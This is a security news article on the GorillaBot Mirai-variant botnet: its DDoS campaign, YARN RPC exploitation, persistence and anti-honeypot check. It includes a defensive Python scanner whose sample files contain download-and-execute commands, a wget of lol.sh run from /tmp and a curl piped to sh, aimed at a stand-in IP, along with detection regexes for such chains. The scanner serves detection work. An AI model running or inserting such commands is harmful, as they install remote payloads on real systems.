GorillaBot reigns as DDoS king with 300,000+ commands



The newly emerged Gorilla Botnet (GorillaBot) launched more than 300,000 DDoS attacks across 100+ countries between September 4 and 27, 2024.

It is a modified version of Mirai that supports multiple CPU architectures and uses advanced techniques to keep long-term control of infected devices.

GorillaBot reigns as DDoS king

The botnet hides key information with encryption algorithms previously used by the KekSec group, a sign of its sophistication and its focus on evading analysis.

Gorilla Botnet targets critical infrastructure like universities, government sites, telecoms, and banks, showing its potential for major disruption.

A notorious DDoS botnet launched over 300,000 attacks daily in September 2024, targeting victims in 113 countries using UDP Flood attacks.

China, the U.S., Canada, and Germany were heavily impacted, especially critical infrastructure organizations.

The botnet’s persistent targeting and use of proven methods pose a serious threat to global online services and infrastructure.

The GorillaBot trojan, a variant of Mirai, supports multiple architectures and connects randomly to one of five C&C servers for commands.

It offers a broader range of DDoS attack methods, including UDP, TCP, GRE, and specialized attacks on protocols like OpenVPN, Discord, and FiveM.

NSFOCUS analysis shows that GorillaBot uses encryption favored by the KekSec group to protect data, and the presence of lol.sh in its code suggests a possible link to KekSec.

This raises suspicions that GorillaBot may be connected to KekSec or using its methods to hide its origin.

GorillaBot is more persistent than typical Mirai botnets: its "yarn_init" function exploits a Hadoop YARN RPC vulnerability to obtain high privileges on the target.

To keep running, it creates a service file so that it starts automatically, and it attempts to download a malicious script ("lol.sh") at boot, at user login, or through custom scripts.

Notably, the bot checks for the "/proc" filesystem before doing anything else, so that it does not run inside honeypot environments that lack it.
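The persistence mechanisms described above (a service unit for automatic startup plus script downloads at boot or login) leave traces in a small, well-known set of files. The following is an added defender-side example, not code from the article or from NSFOCUS: a scanner that walks those locations and flags lines that reference "lol.sh", chain a download into a shell, or start a service from a world-writable directory. The indicator patterns, the path list and the sample file contents (including the TEST-NET-2 address 198.51.100.7) are all assumptions constructed for illustration.

```python
"""Scan Linux persistence locations for GorillaBot-style startup indicators.

Added example; the regexes, path list and SAMPLE_FILES below are constructed
assumptions based on the article's description, not real indicators of compromise.
"""
from __future__ import annotations

import glob
import re
from dataclasses import dataclass

# Assumed indicators: the script name the article mentions, and a fetch
# (wget/curl) piped or chained into a shell interpreter.
SCRIPT_NAME = re.compile(r"\blol\.sh\b")
DOWNLOAD_EXEC = re.compile(r"\b(wget|curl)\b[^;|&\n]*(\|\s*|&&\s*|;\s*)(sh|bash)\b")
WORLD_WRITABLE = ("/tmp/", "/dev/shm/", "/var/tmp/")

# Where boot-time and login-time persistence usually lives (assumed list).
PERSISTENCE_PATHS = (
    "/etc/systemd/system/*.service",
    "/lib/systemd/system/*.service",
    "/etc/rc.local",
    "/etc/init.d/*",
    "/etc/cron.d/*",
    "/etc/profile.d/*.sh",
    "/home/*/.bashrc",
    "/home/*/.profile",
    "/root/.bashrc",
)


@dataclass
class Finding:
    path: str
    line_no: int
    reason: str
    line: str


def scan_text(path: str, text: str) -> list[Finding]:
    """Return one Finding per suspicious, non-comment line in `text`."""
    findings: list[Finding] = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if SCRIPT_NAME.search(line):
            findings.append(Finding(path, n, "references lol.sh", line))
        elif DOWNLOAD_EXEC.search(line):
            findings.append(Finding(path, n, "download-and-execute chain", line))
        # A unit whose ExecStart points into /tmp or /dev/shm is a classic
        # sign of a dropped payload being re-launched at every boot.
        if path.endswith(".service") and line.startswith("ExecStart=") \
                and any(d in line for d in WORLD_WRITABLE):
            findings.append(Finding(path, n, "service executes from world-writable dir", line))
    return findings


def scan_files(files: dict[str, str]) -> list[Finding]:
    """Scan an in-memory {path: contents} mapping (used by the sample below)."""
    out: list[Finding] = []
    for path, text in files.items():
        out.extend(scan_text(path, text))
    return out


def scan_host(patterns: tuple[str, ...] = PERSISTENCE_PATHS) -> list[Finding]:
    """Read the real files matching `patterns` and scan them (needs read access)."""
    files: dict[str, str] = {}
    for pattern in patterns:
        for path in glob.glob(pattern):
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    files[path] = fh.read()
            except OSError:
                continue  # unreadable or vanished; skip silently
    return scan_files(files)


# Constructed sample input: one tampered unit, one tampered rc.local, one clean .bashrc.
SAMPLE_FILES = {
    "/etc/systemd/system/example.service": (
        "[Unit]\nDescription=example\n\n[Service]\n"
        "ExecStart=/bin/sh -c 'wget -q http://198.51.100.7/lol.sh -O /tmp/lol.sh; sh /tmp/lol.sh'\n"
        "Restart=always\n\n[Install]\nWantedBy=multi-user.target\n"
    ),
    "/etc/rc.local": "#!/bin/sh\ncurl -s http://198.51.100.7/x | sh\nexit 0\n",
    "/home/user/.bashrc": "# .bashrc\nalias ll='ls -l'\nexport PATH=$PATH:~/bin\n",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f.path}:{f.line_no}: {f.reason}: {f.line}")
```

Running the module as-is scans only the constructed sample and reports three findings (two on the service unit, one on rc.local); `scan_host()` applies the same logic to the live filesystem, which is the form you would drop into a triage script or a cron-driven integrity check.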


By FirstHackersNews | October 1st, 2024 (updated 2024-11-05T23:48:47+05:30) | BOTNET, Compromised, DDOS, Exploitation, Internet Security, Malware, Security Advisory, Security Update

About the Author: FirstHackersNews - Identifies Security
